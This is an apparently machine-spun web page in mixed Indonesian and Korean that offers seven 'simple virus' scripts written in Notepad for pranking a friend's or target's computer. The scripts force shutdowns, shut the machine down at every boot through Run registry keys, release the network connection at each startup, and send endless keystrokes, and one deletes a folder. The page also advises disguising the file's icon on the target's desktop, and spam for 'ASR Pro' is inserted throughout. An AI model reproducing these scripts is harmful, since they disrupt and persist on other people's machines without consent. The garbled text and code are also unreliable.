You are currently viewing Membuat Spyware Dengan 메모장용 솔루션

Membuat Spyware Dengan 메모장용 솔루션

Membuat Spyware Dengan 메모장 오류를 신청하는 경우 최신 문서가 도움이 될 것입니다.

빠르고 쉬운 PC 수리

  • 1. ASR Pro 다운로드 및 설치
  • 2. 프로그램을 열고 "스캔"을 클릭하십시오.
  • 3. 복구 프로세스를 시작하려면 "복구"를 클릭하십시오.
  • 더 빠르게 즐기세요

    시아파 시양 티닥타쿳 뎅간 종자 컴퓨터 감염? 넷북 바이러스 terkena, maka besar kemungkinan 데스크탑 컴퓨터 kamu jadi tidak bisa digunakan. Apalagi jika komputer kamu kena salah satu dari 20개의 바이러스 komputer paling berbahaya dunia di.Tamat sudah, antara harus beli komputer baru atau install ulang.

    Di balik seramnya serangan 바이러스 컴퓨터, maka berikan jalantikus kamu kumpulan 스크립트 nuller buat membuat 바이러스 컴퓨터 sederhana. 마우 비아르 응각? kelihatan pintar 카약 nullr profesional gitu.simak 7 스크립트 기침 membuat 노트북 또는 컴퓨터 sederhana dengan 메모장

    7 Membuat 바이러스 Sederhana 해킹 스크립트

    Sudah tahu virus komputer itu berbahaya, kok JalanTikus bagikan cara membuat virusnya sih? Ya karena 바이러스 컴퓨터 yang JalanTikus bagikan ini kuma berisi 조각 소프트웨어 sederhana yang akan mengacaukan fungsi tanpa komputer merusak 장비 atau membokorkan informasi yang American Dental Association di dalamnya. Jadi Aman David Kokok Untuk digunakan 컴퓨터 menjahili teman kamu.

    1. 멤부아트 정류장

    바이러스 바이러스 kerja pester komputer sederhana ini adalah dengan memaksa komputer teman atau target jadi 종료. Untuk melakukannya, silakan buka 메모장, serta 굽기 붙여넣기 코드 bawah di. 랄루 프로텍트 파일-냐 나마 덴간 ForceShutdown.bat 유형 바우처 파일-냐 파일 모두

    <코드>@에코 꺼짐강력한 메시지 . 나는 너를 좋아하지 않아shutdown -f “오류! 컴퓨터가 다운되었습니다!” -와 함께

    빠르고 쉬운 PC 수리

    컴퓨터가 이전보다 약간 느리게 실행되고 있습니까? 팝업이 점점 더 많이 표시되거나 인터넷 연결이 약간 불안정한 것 같습니다. 걱정하지 마세요, 해결책이 있습니다! ASR Pro은 버튼 클릭만으로 모든 성가신 Windows 문제를 해결하는 데 도움이 되는 혁신적인 새 소프트웨어입니다. ASR Pro을 사용하면 컴퓨터가 순식간에 새 것처럼 작동합니다!

  • 1. ASR Pro 다운로드 및 설치
  • 2. 프로그램을 열고 "스캔"을 클릭하십시오.
  • 3. 복구 프로세스를 시작하려면 "복구"를 클릭하십시오.

  • Untuk mengaktifkan 바이러스 ini, kamu harus klik only two info kali pada-nya. 마카, Otomatis secara virusini akan berjalan.

    2. 팍사 세티압 칼리 뎅간 디냐라칸 정류장

    berbeda sebelumnya 바이러스 백신, sederhana hsv yang ini akan memaksa komputer teman kamu untuk 종료 setiap kali dinyalakan. Ayts, jangan asal gunakan pc virus ini kalo siap gak tanggung akibatnya ya!

    <코드>에코 @echo 꺼짐>c:windowshartell.bat에코 덤프 >> c:windowshartell.bat에코 -r 종료 -t 팔십 여덟 -f>>c:windowshartell.bat에코 종료>>c:windowshartell.batreg 추가 hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI Reg_sz /t /d c:windowshartlell.bat /freg install hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz C:windowshartell /d.bat /fecho 당신은 해킹당했습니다.정지시키다

    심판 평가 부아탄 카무 아타스 디 뎅간 나마 함피 세무아. 장안 루파 엑스텐시 구나칸 .trump you! “Untuk Less Active”를 클릭하십시오.

    3. 메마티칸 인터넷 세카라 퍼머넌트

    Saat berada di suatu online, jaringan pastei kesal dong jika American Dental Assoc. Orang Yang Malach를 다운로드 하시겠습니까? Bikin im Internet lemot karena bandwith berkurang cepat. Makanya, coba 인터넷 matikan teman kamu menggunakan sederhana berikut, 바이러스 시나리오:

    <코드>에코 @echo 꺼짐>c:windowswimn32.batecho-blast>>c:windowswimn32.batecho ipconfig/release_all>>c:windowswimn32.bat에코 종료>>c:windowswimn32.batreg 가져오기 hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI Reg_sz /t /d c:windowswimn32.bat /freg 취득 hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t /d reg_sz c:windowswimn32.bat /fecho 해킹당했습니다!정지시키다

    Sepertibias, simpandengan nama hampir semua gunakan john ekstensi.bat. Lalu klik untuk mengaktifkannya!

    4. Caps Lock

    Siapa yang tidak kesal jika American Dental Association or ngetik isinya huruf besar semua? Orang Yang minerima pesan dengan huruf besar semua jelas akan terganggu, 메라사 아타우 바칸 마라. Makanya, yuk isengin teman kamu dengan membuat Caps tombol Lock-nya nyala terus menggunakan 감염 스크립트 sederhana berikut:

    파일에서 코드를 복사하여 메모장으로 만들고 일반적으로 ForceCapsLock.vbs 명령과 파일 종류 nya All File을 남겨두십시오. 3 kali buat mulai mengaktifkan sederhana 개인화 컴퓨터 바이러스 ini를 누르십시오.

    5. 바이러스알라이

    Siapa는 cuma anak muda kekinian doang yang bisa alay를 합니까? 컴퓨터 kamu juga bisa alay loh kalo 병원체 terinspeksi keyboard alay. 아니요, Buat Membuat 바이러스 컴퓨터 Jan Akan Membuat PC 키보드 Jadi Alai, Kamu Bisa Gunakan Software Sama, Bericut:

    Caranya와 물질 코드를 작은 메모장에 복사하십시오. 파일을 ForceAlay.vbs로 저장하고 결과적으로 전체 파일을 기록해 둡니다.

    6. 오렌지 젤레크 바이러스

    membuat 스파이웨어 및 애드웨어 dengan 메모장

    Dikatain itu jelek emang nyebelin. Kalo kuma sekali dua kali sih harushna masih bisa ditahan, tapi kalo terus-terusan ngatai gimana jelek koba? 아니요, dengan kode di bawah ini, kamu bisa membuat sebuah 바이러스 백신 컴퓨터 sederhana yang akan memaksa komputer target buat mengeluarkan wary bahwa ‘dia jelek’ tanpa heti.

    <코드>wshShell 의미 설정wscript.CreateObject(“WScript.Shell”)하다wscript.sleep 100wshshell.sendkeys “Muka Lu Jelek Kayak Lou의 컴퓨터“리본

    복사하여 붙여넣기 소프트웨어 sederhana dike atas 메모장. Oh ia, kamu bisa bagian ganti varna merah dengan kata-kata sesuay selera, lalu dengan nama store VirusOrangJelek.vbs.

    7. 퀴즈 바이러스

    Semua orang suka kuis kalo apalagi Berhadiah. 타피 카무 바칼 케살 데 파스티 세티압 칼로 칼리 마우 부카 컴퓨터, 테르냐타 양 농골 아달라 쿠이스. 예, 저는 할수 있습니다? Buat kamu yang mau isengin 대상 컴퓨터 dengan kuis-kuis menyebalkan, coba kamu gunakan 소프트웨어 berikut:

    <코드>@에코 꺼짐이름은 쿠이스하리이니!:메뉴나누다Echo Jika kamu kena hsv apa yang kamu pilih lakukan?부서지다양망의 메아리:에코 1. 모닝 컴퓨터에코 2. aja 형식에코 3. 낭기스에코 4. 벨리 컴퓨터 바Enter = 아무것도 설치하지 않음설정 /p 입력=선택:%input%==1인 경우 -h 중지 -t서른%input%==2인 경우 중복 콘텐츠 제거 c:xxx%input%==3 @ECHO가 비활성화된 경우msg ( space ) 카무 젤리 가루메시지 * Ngacha dulu gih!msg * Hayo 읽기, CPU 상태 gw acak-acak ya4. 오우다 포스트, 우랑 아자 산msg 마우 켈라 칸 마살라냐[email protected]에코 꺼짐:위에시작 %시스템루트%system32notepad.exe일어나

    ViruzQuiz nama.bat로 노트북을 복사하여 붙여넣으세요. Selesai, tinggal jalankan buat mengujinya.

    한천 berjalan lancar, coba simpan 파일 바이러스 컴퓨터 sederhana yang kamu buat komputer di target. Lalu letakkan report tersebut di desktop, stan jangan lupa ubah icon